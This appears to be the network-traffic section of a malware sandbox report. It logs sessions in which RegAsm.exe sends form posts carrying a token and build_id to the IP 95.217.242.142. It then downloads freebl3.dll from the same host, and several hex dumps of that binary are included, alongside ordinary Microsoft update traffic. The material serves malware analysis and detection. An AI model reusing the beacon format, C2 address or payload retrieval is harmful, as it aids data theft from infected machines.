                                                                                                                                                                                                                                                            15192.168.2.44975495.217.242.1424437440C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-04-29 20:13:13 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----EGCFIDAFBFBAKFHJEGIJ
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                            Host: 95.217.242.142
                                                                                                                                                                                                                                                            Content-Length: 4677
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            2024-04-29 20:13:13 UTC4677OUTData Raw: 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 34 63 34 64 34 39 33 39 62 63 39 31 38 62 65 32 63 62 39 32 61 36 31 37 64 39 39 61 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 33 63 65 61 32 36 30 39 30 32 33 64 31 33 66 31 34 35 61 63 36 63 35 64 63 38 39 37 31 31 32 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                            Data Ascii: ------EGCFIDAFBFBAKFHJEGIJContent-Disposition: form-data; name="token"24c4d4939bc918be2cb92a617d99a9f0------EGCFIDAFBFBAKFHJEGIJContent-Disposition: form-data; name="build_id"03cea2609023d13f145ac6c5dc897112------EGCFIDAFBFBAKFHJEGIJCont
                                                                                                                                                                                                                                                            2024-04-29 20:13:14 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 29 Apr 2024 20:13:14 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            2024-04-29 20:13:14 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            16192.168.2.44975623.6.204.109443
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-04-29 20:13:14 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                                            If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                            Range: bytes=0-2147483646
                                                                                                                                                                                                                                                            User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                            Host: fs.microsoft.com
                                                                                                                                                                                                                                                            2024-04-29 20:13:14 UTC530INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                            ApiVersion: Distribute 1.1
                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                            X-Azure-Ref: 0rcGnYgAAAAANOnx9vccHTr21ROgX9ESTU0pDRURHRTAzMDkAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm
                                                                                                                                                                                                                                                            Cache-Control: public, max-age=38955
                                                                                                                                                                                                                                                            Date: Mon, 29 Apr 2024 20:13:14 GMT
                                                                                                                                                                                                                                                            Content-Length: 55
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            X-CID: 2
                                                                                                                                                                                                                                                            2024-04-29 20:13:14 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                                                                            Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            17192.168.2.44975595.217.242.1424437440C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-04-29 20:13:14 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----FCAECAKKFBGCBGDGIEHC
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                            Host: 95.217.242.142
                                                                                                                                                                                                                                                            Content-Length: 1529
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            2024-04-29 20:13:14 UTC1529OUTData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 45 43 41 4b 4b 46 42 47 43 42 47 44 47 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 34 63 34 64 34 39 33 39 62 63 39 31 38 62 65 32 63 62 39 32 61 36 31 37 64 39 39 61 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 45 43 41 4b 4b 46 42 47 43 42 47 44 47 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 33 63 65 61 32 36 30 39 30 32 33 64 31 33 66 31 34 35 61 63 36 63 35 64 63 38 39 37 31 31 32 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 45 43 41 4b 4b 46 42 47 43 42 47 44 47 49 45 48 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                            Data Ascii: ------FCAECAKKFBGCBGDGIEHCContent-Disposition: form-data; name="token"24c4d4939bc918be2cb92a617d99a9f0------FCAECAKKFBGCBGDGIEHCContent-Disposition: form-data; name="build_id"03cea2609023d13f145ac6c5dc897112------FCAECAKKFBGCBGDGIEHCCont
                                                                                                                                                                                                                                                            2024-04-29 20:13:15 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 29 Apr 2024 20:13:15 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            2024-04-29 20:13:15 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            18192.168.2.44975795.217.242.1424437440C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-04-29 20:13:15 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----BGHJJDGHCBGDHIECBGID
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                            Host: 95.217.242.142
                                                                                                                                                                                                                                                            Content-Length: 437
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            2024-04-29 20:13:15 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 34 63 34 64 34 39 33 39 62 63 39 31 38 62 65 32 63 62 39 32 61 36 31 37 64 39 39 61 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 33 63 65 61 32 36 30 39 30 32 33 64 31 33 66 31 34 35 61 63 36 63 35 64 63 38 39 37 31 31 32 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                            Data Ascii: ------BGHJJDGHCBGDHIECBGIDContent-Disposition: form-data; name="token"24c4d4939bc918be2cb92a617d99a9f0------BGHJJDGHCBGDHIECBGIDContent-Disposition: form-data; name="build_id"03cea2609023d13f145ac6c5dc897112------BGHJJDGHCBGDHIECBGIDCont
                                                                                                                                                                                                                                                            2024-04-29 20:13:16 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 29 Apr 2024 20:13:16 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            2024-04-29 20:13:16 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            19192.168.2.44975840.127.169.103443
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-04-29 20:13:16 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=RauG9dSpKm2dhpW&MD=978uZbzx HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                            Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                            2024-04-29 20:13:16 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            Expires: -1
                                                                                                                                                                                                                                                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                            ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                                                                            MS-CorrelationId: ca0fcaec-8036-4a98-976c-daedc9877e07
                                                                                                                                                                                                                                                            MS-RequestId: b5bd261f-2283-4249-821f-b49d47bcae2b
                                                                                                                                                                                                                                                            MS-CV: XbbyDUm2bEyH44aQ.0
                                                                                                                                                                                                                                                            X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            Date: Mon, 29 Apr 2024 20:13:15 GMT
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Length: 24490
                                                                                                                                                                                                                                                            2024-04-29 20:13:16 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                                                                            Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                                                                            2024-04-29 20:13:16 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                                                                            Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            20192.168.2.44975995.217.242.1424437440C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-04-29 20:13:16 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----EBGCBAFCGDAAKFIDGIEG
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                            Host: 95.217.242.142
                                                                                                                                                                                                                                                            Content-Length: 437
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            2024-04-29 20:13:16 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 45 42 47 43 42 41 46 43 47 44 41 41 4b 46 49 44 47 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 34 63 34 64 34 39 33 39 62 63 39 31 38 62 65 32 63 62 39 32 61 36 31 37 64 39 39 61 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 43 42 41 46 43 47 44 41 41 4b 46 49 44 47 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 33 63 65 61 32 36 30 39 30 32 33 64 31 33 66 31 34 35 61 63 36 63 35 64 63 38 39 37 31 31 32 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 43 42 41 46 43 47 44 41 41 4b 46 49 44 47 49 45 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                            Data Ascii: ------EBGCBAFCGDAAKFIDGIEGContent-Disposition: form-data; name="token"24c4d4939bc918be2cb92a617d99a9f0------EBGCBAFCGDAAKFIDGIEGContent-Disposition: form-data; name="build_id"03cea2609023d13f145ac6c5dc897112------EBGCBAFCGDAAKFIDGIEGCont
                                                                                                                                                                                                                                                            2024-04-29 20:13:17 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 29 Apr 2024 20:13:17 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            2024-04-29 20:13:17 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            21192.168.2.44976495.217.242.1424437440C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-04-29 20:13:17 UTC221OUTGET /freebl3.dll HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                            Host: 95.217.242.142
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            2024-04-29 20:13:18 UTC246INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 29 Apr 2024 20:13:18 GMT
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            Content-Length: 685392
                                                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            ETag: "6315a9f4-a7550"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            2024-04-29 20:13:18 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00
                                                                                                                                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
                                                                                                                                                                                                                                                            2024-04-29 20:13:18 UTC16384INData Raw: 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4 c3 01 89 5d 9c 8b 45 b8 03 85 30 ff ff ff 8b
                                                                                                                                                                                                                                                            Data Ascii: }1M1XM}}UU1M1UM] EH]EE|1E1EMMuuU1M1Mu]uM11U|uuMM1]1x]E0
                                                                                                                                                                                                                                                            2024-04-29 20:13:18 UTC16384INData Raw: 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50 90 07 00 83 c4 04 89 45 e8 ff 77 1c e8 42 90
                                                                                                                                                                                                                                                            Data Ascii: M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wPEwB
                                                                                                                                                                                                                                                            2024-04-29 20:13:18 UTC16384INData Raw: 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00 0f a3 d6 73 3b 8b 75 18 83 fe 02 73 33 8b 7d
                                                                                                                                                                                                                                                            Data Ascii: 0C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwEs;us3}
                                                                                                                                                                                                                                                            2024-04-29 20:13:18 UTC16384INData Raw: 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08 89 cb 89 4d f0 8d 14 3e 81 c2 31 23 43 e4 0f
                                                                                                                                                                                                                                                            Data Ascii: ^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?UuM>1#C
                                                                                                                                                                                                                                                            2024-04-29 20:13:18 UTC16384INData Raw: 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00 00 77 12 31 c0 81 f9 00 01 00 00 0f 93 c0
                                                                                                                                                                                                                                                            Data Ascii: }EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@w,0w w1
